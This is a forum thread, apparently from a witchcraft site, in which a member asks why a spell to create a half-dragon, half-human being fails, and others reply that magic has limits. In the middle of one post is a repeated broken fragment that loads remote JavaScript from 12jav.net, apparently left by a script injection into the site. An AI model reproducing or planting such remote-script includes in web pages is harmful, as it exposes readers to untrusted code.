This is just a very strange question. You need will power and faith in order to cast a spell that will work.

This is a very strange question indeed, you can mediate, ground, center, etc in order to help you build your " will power" but faith... you would just have to believe in order for a spell to even work!

In order to cast a spell you must have faith and will power. Without faith a spell is meaningless.
well i have been trying to build up my will power.
i have been trying this one spell to create a person that is half dragon and half human.
but i still can't find out why i can't cast this spell. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
i have faith i have imagination, i have belief.
but i don't think.

You can put all of your belief into that spell but it will never work. Magic isn't going to change DNA, nor is it going to create a physical being out of something that does not exist on the physical plane.
so now what am i go to do.

The spell won't work no matter what you use or what you do.
Magic does have its limits. Perhaps you need to spend some more time learning about what magic truly is and what it can and cannot do. I suggest the book "Modern Magick" by Donald Michael Kraig.

If you are over our site age minimum of 13 I find it very sad that you would actually think that it would be remotely possible to create a half human/half dragon creature. The most essential of all magical tools are common sense, maturity, and intelligence. If you lack these you are wasting your time in the craft.
